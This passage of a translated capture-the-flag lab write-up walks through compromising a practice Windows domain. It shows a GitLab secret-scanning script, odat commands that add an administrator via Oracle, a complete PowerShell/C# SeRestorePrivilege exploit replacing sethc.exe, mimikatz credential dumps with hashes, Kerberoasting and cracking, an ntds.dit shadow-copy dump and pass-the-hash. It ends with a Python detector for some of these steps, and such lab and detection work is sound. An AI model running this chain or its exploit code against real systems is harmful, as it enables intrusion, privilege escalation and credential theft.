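    $blobs = Get-GitLabPages "$Base/projects/$($p.id)/repository/tree?recursive=true&ref=$($p.default_branch)" |
             Where-Object { $_.type -eq 'blob' }
    foreach ($f in $blobs) {
        # file_path must be URL-encoded, slashes included, for the files endpoint.
        $enc = [uri]::EscapeDataString($f.path)
        try {
            $raw = (Invoke-WebRequest -UseBasicParsing -Headers $Headers `
                    -Uri "$Base/projects/$($p.id)/repository/files/$enc/raw?ref=$($p.default_branch)").Content
        } catch { continue }                          # unreadable blob; move on
        if ($raw -isnot [string]) { continue }        # binary content comes back as byte[]; skip it
        foreach ($hit in ($raw -split "`n" | Select-String -Pattern $Pattern)) {
            Write-Host "  $($f.path):$($hit.LineNumber): $($hit.Line.Trim())"
        }
    }
}
```

Hits on the xradmin project would surface the url/username/password lines shown above; the same loop also covers repositories whose names give no hint that they hold secrets.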
odat is a toolkit for attacking Oracle. Its dbmsscheduler module runs OS commands on the database host through DBMS_SCHEDULER; here we connect as SYSDBA with the recovered account and add an administrator:
proxychains4 ./odat dbmsscheduler -s 172.22.14.31 -p 1521 -d ORCL -U xradmin -P fcMyE8t9E4XdsKf --sysdba --exec 'net user ocean admin@123 /add'
proxychains4 ./odat dbmsscheduler -s 172.22.14.31 -p 1521 -d ORCL -U xradmin -P fcMyE8t9E4XdsKf --sysdba --exec 'net localgroup administrators ocean /add'
The ARM build of Kali does not have this tool, so I looked at other things first.
Later I downloaded it on a cloud server and the attack succeeded from there.
One column in the credential list above holds machine names, and they look like the hosts fscan found:
XR-0923 | zhangshuai | wSbEajHzZs
RDP over first.
This user is allowed to log in remotely.
SeRestorePrivilege privilege escalation
proxychains evil-winrm -i 172.22.14.46 -u zhangshuai -p wSbEajHzZs
Interesting: the WinRM session's token carries one privilege more than the RDP session did, and that one, SeRestorePrivilege, is enough to escalate.
SeRestorePrivilege grants write access to every object on the system regardless of its ACL. It shows as Disabled in whoami /priv, which only means it has to be enabled in the token before it takes effect; the token does hold it. Three ways to abuse it:
- replace a service binary
- overwrite a DLL loaded by a system process
- modify registry settings
The route used here is the same as the Magnifier trick: swap the sticky-keys binary for cmd.exe, lock the screen and press Shift five times, and winlogon launches our cmd.exe as SYSTEM. References: https://forum.butian.net/share/348 and https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-Windows%E4%B9%9D%E7%A7%8D%E6%9D%83%E9%99%90%E7%9A%84%E5%88%A9%E7%94%A8
Run the renames in C:\Windows\System32:
ren sethc.exe sethc.bak
ren cmd.exe sethc.exe
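The two renames only succeed once the privilege is actually enabled, and the kernel applies the SeRestore bypass to file opens that carry FILE_FLAG_BACKUP_SEMANTICS. The PowerShell below is an added example, not code from the original writeup, for the evil-winrm session: it enables SeRestorePrivilege on the current process token with AdjustTokenPrivileges, opens sethc.exe through CreateFile with backup semantics, and writes cmd.exe's bytes into it, so cmd.exe itself stays in place. The original sethc.exe is first copied to the user's temp directory (an assumed location) so it can be written back the same way afterwards.

```powershell
# Added example, not from the original writeup: abuse SeRestorePrivilege from the WinRM shell.
# Assumes the token holds SeRestorePrivilege (shown as Disabled in `whoami /priv`).
$src = @'
using System;
using System.Runtime.InteropServices;
using Microsoft.Win32.SafeHandles;
public static class Restore {
    [StructLayout(LayoutKind.Sequential)] public struct LUID { public uint LowPart; public int HighPart; }
    [StructLayout(LayoutKind.Sequential)] public struct TOKEN_PRIVILEGES { public uint Count; public LUID Luid; public uint Attr; }
    [DllImport("kernel32.dll")] static extern IntPtr GetCurrentProcess();
    [DllImport("advapi32.dll", SetLastError = true)] static extern bool OpenProcessToken(IntPtr p, uint access, out IntPtr tok);
    [DllImport("advapi32.dll", SetLastError = true, CharSet = CharSet.Unicode)] static extern bool LookupPrivilegeValue(string sys, string name, out LUID luid);
    [DllImport("advapi32.dll", SetLastError = true)] static extern bool AdjustTokenPrivileges(IntPtr tok, bool disableAll, ref TOKEN_PRIVILEGES np, uint len, IntPtr prev, IntPtr ret);
    [DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
    static extern SafeFileHandle CreateFile(string path, uint access, uint share, IntPtr sa, uint disp, uint flags, IntPtr tmpl);

    // Turn a held-but-disabled privilege on. AdjustTokenPrivileges returns true even when the
    // token never held the privilege, signalling that with ERROR_NOT_ALL_ASSIGNED (1300).
    public static bool EnablePrivilege(string name) {
        IntPtr tok;
        if (!OpenProcessToken(GetCurrentProcess(), 0x0020 | 0x0008, out tok)) return false; // TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY
        LUID luid;
        if (!LookupPrivilegeValue(null, name, out luid)) return false;
        var tp = new TOKEN_PRIVILEGES { Count = 1, Luid = luid, Attr = 0x2 };            // SE_PRIVILEGE_ENABLED
        if (!AdjustTokenPrivileges(tok, false, ref tp, 0, IntPtr.Zero, IntPtr.Zero)) return false;
        return Marshal.GetLastWin32Error() == 0;
    }
    // Open an existing file for writing with backup intent: the DACL bypass that SeRestorePrivilege
    // grants applies only to opens that pass FILE_FLAG_BACKUP_SEMANTICS.
    public static SafeFileHandle OpenForRestore(string path) {
        const uint GENERIC_WRITE = 0x40000000, FILE_SHARE_READ = 1, TRUNCATE_EXISTING = 5, BACKUP_SEMANTICS = 0x02000000;
        var h = CreateFile(path, GENERIC_WRITE, FILE_SHARE_READ, IntPtr.Zero, TRUNCATE_EXISTING, BACKUP_SEMANTICS, IntPtr.Zero);
        if (h.IsInvalid) throw new System.ComponentModel.Win32Exception(Marshal.GetLastWin32Error());
        return h;
    }
}
'@
Add-Type -TypeDefinition $src

$sys32  = Join-Path $env:SystemRoot 'System32'
$target = Join-Path $sys32 'sethc.exe'
$backup = Join-Path $env:TEMP 'sethc.exe.bak'     # assumed backup location; write it back the same way when done

if (-not [Restore]::EnablePrivilege('SeRestorePrivilege')) { throw 'SeRestorePrivilege is not held by this token' }

# sethc.exe is readable by everyone, so a plain copy is enough for the backup.
Copy-Item -Path $target -Destination $backup -Force

# Overwrite sethc.exe with cmd.exe through the backup-intent handle; cmd.exe itself is untouched.
$payload = [IO.File]::ReadAllBytes((Join-Path $sys32 'cmd.exe'))
$h  = [Restore]::OpenForRestore($target)
$fs = New-Object System.IO.FileStream($h, [System.IO.FileAccess]::Write)
$fs.Write($payload, 0, $payload.Length)
$fs.Dispose()
Write-Host "sethc.exe replaced. Lock the screen and press Shift five times for a SYSTEM cmd; restore from $backup afterwards."
```

If EnablePrivilege returns false the token simply does not carry the privilege and no amount of retrying helps; if OpenForRestore throws ERROR_ACCESS_DENIED after a successful enable, the open is missing the backup-semantics flag.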
Escalation succeeded. Next, dump the hashes.
To keep a foothold, add a backdoor user first, then dump the logon credentials on the machine:
mimikatz # sekurlsa::logonpasswords
Authentication Id : 0 ; 5971088 (00000000:005b1c90)
Session : Interactive from 3
User Name : DWM-3
Domain : Window Manager
Logon Server : (null)
Logon Time : 2025/3/10 19:32:26
SID : S-1-5-90-0-3
msv :
[00000003] Primary
* Username : XR-0923$
* Domain : XIAORANG
* NTLM : a4f432e39e79dc4ad8b85854ed243f61
* SHA1 : 2718b31174dc5fe2ae10f2aeecb08af8fbf4fd1f
tspkg :
wdigest :
* Username : XR-0923$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : XR-0923$
* Domain : xiaorang.lab
* Password : 18 77 1d d8 f8 70 90 6d df 7b 30 47 4d 9d b7 7d 8e 84 8a 85 57 e9 68 44 69 f5 01 a2 27 f6 d2 05 95 83 45 86 54 82 7d 6c 17 58 0b 38 04 af ff a6 ff ec 01 87 77 22 7c f6 bf 43 72 88 14 5b c5 9c dd 34 62 5c dd 7b c5 82 9c 10 16 9b 25 fa d6 cb d3 2d 9f 8b f3 f4 9d 8f 3b 64 2f b8 b1 44 5b f5 b0 87 2d bc e0 11 50 c3 23 12 75 f6 32 7b a7 8e ce b7 3d 89 b1 56 12 c5 7e cc 60 98 5d c7 7d 4d 45 6e fd c3 65 41 ba 8a fe 7e fb f8 79 ca 60 f7 4e be bc 62 04 71 47 15 ea 19 f0 ad 00 f7 39 7a b1 01 f6 bf e6 c1 33 a8 bf 0b 7d 4c 0f 54 cb 0b 40 28 6e 3d 3e d9 19 8e 44 4e 2e 62 28 76 78 d2 d3 57 ec 9f 12 d7 bc 51 56 88 ed 67 99 4f 09 01 49 b3 e0 02 33 6e 26 31 c3 53 a7 bd 79 20 2e 17 ed 11 c4 d7 a5 fc 31 0c 72 75 aa 8f 39 12 fd 7e
ssp :
credman :
cloudap :
Authentication Id : 0 ; 5970395 (00000000:005b19db)
Session : Interactive from 3
User Name : DWM-3
Domain : Window Manager
Logon Server : (null)
Logon Time : 2025/3/10 19:32:26
SID : S-1-5-90-0-3
msv :
[00000003] Primary
* Username : XR-0923$
* Domain : XIAORANG
* NTLM : a4f432e39e79dc4ad8b85854ed243f61
* SHA1 : 2718b31174dc5fe2ae10f2aeecb08af8fbf4fd1f
tspkg :
wdigest :
* Username : XR-0923$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : XR-0923$
* Domain : xiaorang.lab
* Password : 18 77 1d d8 f8 70 90 6d df 7b 30 47 4d 9d b7 7d 8e 84 8a 85 57 e9 68 44 69 f5 01 a2 27 f6 d2 05 95 83 45 86 54 82 7d 6c 17 58 0b 38 04 af ff a6 ff ec 01 87 77 22 7c f6 bf 43 72 88 14 5b c5 9c dd 34 62 5c dd 7b c5 82 9c 10 16 9b 25 fa d6 cb d3 2d 9f 8b f3 f4 9d 8f 3b 64 2f b8 b1 44 5b f5 b0 87 2d bc e0 11 50 c3 23 12 75 f6 32 7b a7 8e ce b7 3d 89 b1 56 12 c5 7e cc 60 98 5d c7 7d 4d 45 6e fd c3 65 41 ba 8a fe 7e fb f8 79 ca 60 f7 4e be bc 62 04 71 47 15 ea 19 f0 ad 00 f7 39 7a b1 01 f6 bf e6 c1 33 a8 bf 0b 7d 4c 0f 54 cb 0b 40 28 6e 3d 3e d9 19 8e 44 4e 2e 62 28 76 78 d2 d3 57 ec 9f 12 d7 bc 51 56 88 ed 67 99 4f 09 01 49 b3 e0 02 33 6e 26 31 c3 53 a7 bd 79 20 2e 17 ed 11 c4 d7 a5 fc 31 0c 72 75 aa 8f 39 12 fd 7e
ssp :
credman :
cloudap :
Authentication Id : 0 ; 5969701 (00000000:005b1725)
Session : Interactive from 3
User Name : UMFD-3
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 2025/3/10 19:32:26
SID : S-1-5-96-0-3
msv :
[00000003] Primary
* Username : XR-0923$
* Domain : XIAORANG
* NTLM : a4f432e39e79dc4ad8b85854ed243f61
* SHA1 : 2718b31174dc5fe2ae10f2aeecb08af8fbf4fd1f
tspkg :
wdigest :
* Username : XR-0923$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : XR-0923$
* Domain : xiaorang.lab
* Password : 18 77 1d d8 f8 70 90 6d df 7b 30 47 4d 9d b7 7d 8e 84 8a 85 57 e9 68 44 69 f5 01 a2 27 f6 d2 05 95 83 45 86 54 82 7d 6c 17 58 0b 38 04 af ff a6 ff ec 01 87 77 22 7c f6 bf 43 72 88 14 5b c5 9c dd 34 62 5c dd 7b c5 82 9c 10 16 9b 25 fa d6 cb d3 2d 9f 8b f3 f4 9d 8f 3b 64 2f b8 b1 44 5b f5 b0 87 2d bc e0 11 50 c3 23 12 75 f6 32 7b a7 8e ce b7 3d 89 b1 56 12 c5 7e cc 60 98 5d c7 7d 4d 45 6e fd c3 65 41 ba 8a fe 7e fb f8 79 ca 60 f7 4e be bc 62 04 71 47 15 ea 19 f0 ad 00 f7 39 7a b1 01 f6 bf e6 c1 33 a8 bf 0b 7d 4c 0f 54 cb 0b 40 28 6e 3d 3e d9 19 8e 44 4e 2e 62 28 76 78 d2 d3 57 ec 9f 12 d7 bc 51 56 88 ed 67 99 4f 09 01 49 b3 e0 02 33 6e 26 31 c3 53 a7 bd 79 20 2e 17 ed 11 c4 d7 a5 fc 31 0c 72 75 aa 8f 39 12 fd 7e
ssp :
credman :
cloudap :
Authentication Id : 0 ; 3150114 (00000000:00301122)
Session : RemoteInteractive from 2
User Name : zhangshuai
Domain : XR-0923
Logon Server : XR-0923
Logon Time : 2025/3/10 19:13:09
SID : S-1-5-21-754105099-1176710061-2177073800-1001
msv :
[00000003] Primary
* Username : zhangshuai
* Domain : XR-0923
* NTLM : f97d5a4b44b11bc257a63c3f76f18a9a
* SHA1 : f6ff2714d556240436758527e190e329f05cd43d
tspkg :
wdigest :
* Username : zhangshuai
* Domain : XR-0923
* Password : (null)
kerberos :
* Username : zhangshuai
* Domain : XR-0923
* Password : (null)
ssp :
credman :
cloudap :
Authentication Id : 0 ; 3150084 (00000000:00301104)
Session : RemoteInteractive from 2
User Name : zhangshuai
Domain : XR-0923
Logon Server : XR-0923
Logon Time : 2025/3/10 19:13:09
SID : S-1-5-21-754105099-1176710061-2177073800-1001
msv :
[00000003] Primary
* Username : zhangshuai
* Domain : XR-0923
Got the flag.
Use the hash of this machine's account to check for SPNs.
Found tianjing.
proxychains4 python3 GetUserSPNs.py xiaorang.lab/'XR-0923$' -hashes ':a4f432e39e79dc4ad8b85854ed243f61' -dc-ip 172.22.14.11 -request-user tianjing
Crack the hash with john.
john hash --wordlist=/usr/share/wordlists/rockyou.txt
Log in.
proxychains4 evil-winrm -i 172.22.14.11 -u tianjing -p DPQSXSXgh2
Found the SeBackupPrivilege privilege.
Copying SAM with SeBackupPrivilege
First create a diskshadow script file locally, named raj.dsh here, with the following content:
set context persistent nowriters
add volume c: alias raj
create
expose %raj% z:
Next, use unix2dos to convert the dsh file's line endings to Windows-compatible ones.
unix2dos raj.dsh
Create a test folder under C:\, change into it, and upload raj.dsh.
mkdir test
cd test
upload raj.dsh
Finally, take the volume shadow copy.
diskshadow /s raj.dsh
Then copy ntds.dit to the current directory.
RoboCopy /b z:\windows\ntds . ntds.dit
Then back up the SYSTEM registry hive and download it locally.
reg save hklm\system system
download system
Then decrypt with impacket-secretsdump.
impacket-secretsdump -ntds ntds.dit -system system local
With the domain admin's hash, pass-the-hash.
proxychains4 python3 smbexec.py -hashes :70c39b547b7d8adec35ad7c09fb1d277 [email protected]
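As an added example (not part of the original write-up), the following Python flags the two techniques used above from the defender's side: Kerberoast requests (event 4769 with RC4 ticket encryption) and a logon session that was granted SeBackupPrivilege (event 4672) and then ran diskshadow, robocopy /b or reg save. The event records are constructed sample data; the field names and values are assumptions, not real logs from this range.

```python
# Added example, not from the original write-up: detection logic for the
# Kerberoast and SeBackupPrivilege steps above, run over constructed events.
from collections import defaultdict

# Constructed sample Security events (names mirror the range, values are placeholders).
SAMPLE_EVENTS = [
    {"id": 4769, "account": "XR-0923$@XIAORANG.LAB", "service": "tianjing", "etype": "0x17"},
    {"id": 4769, "account": "ocean@XIAORANG.LAB", "service": "krbtgt", "etype": "0x12"},
    {"id": 4672, "account": "tianjing", "logon_id": "0x3e7a1",
     "privileges": "SeBackupPrivilege SeRestorePrivilege"},
    {"id": 4688, "account": "tianjing", "logon_id": "0x3e7a1", "cmdline": r"diskshadow /s raj.dsh"},
    {"id": 4688, "account": "tianjing", "logon_id": "0x3e7a1",
     "cmdline": r"RoboCopy /b z:\windows\ntds . ntds.dit"},
    {"id": 4688, "account": "tianjing", "logon_id": "0x3e7a1", "cmdline": r"reg save hklm\system system"},
    {"id": 4688, "account": "ocean", "logon_id": "0x12345", "cmdline": r"notepad.exe"},
]

RC4_ETYPES = {"0x17", "0x18"}  # RC4-HMAC ticket types: what GetUserSPNs-style requests ask for
BACKUP_TOOLS = ("diskshadow", "robocopy /b", "reg save hklm\\system", "ntds.dit")


def detect_kerberoast(events, min_spns=1):
    """Accounts requesting RC4-encrypted service tickets for non-krbtgt SPNs."""
    by_account = defaultdict(set)
    for e in events:
        if e["id"] == 4769 and e["etype"].lower() in RC4_ETYPES and e["service"].lower() != "krbtgt":
            by_account[e["account"]].add(e["service"])
    return {acct: sorted(s) for acct, s in by_account.items() if len(s) >= min_spns}


def detect_backup_privilege_abuse(events):
    """Sessions granted SeBackupPrivilege that then run shadow-copy / hive-dump tooling."""
    privileged = {e["logon_id"] for e in events
                  if e["id"] == 4672 and "SeBackupPrivilege" in e["privileges"]}
    hits = defaultdict(list)
    for e in events:
        if e["id"] == 4688 and e["logon_id"] in privileged:
            if any(tok in e["cmdline"].lower() for tok in BACKUP_TOOLS):
                hits[e["account"]].append(e["cmdline"])
    return dict(hits)


if __name__ == "__main__":
    print("kerberoast:", detect_kerberoast(SAMPLE_EVENTS))
    print("backup-priv abuse:", detect_backup_privilege_abuse(SAMPLE_EVENTS))
```

Feeding real 4769/4672/4688 records into the same shape lets the rule run against exported logs; 4688 needs command-line auditing enabled to carry the cmdline field.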
Originally published on the WeChat public account (土拨鼠的安全屋): 春秋云镜系列靶场通过记录-Privilege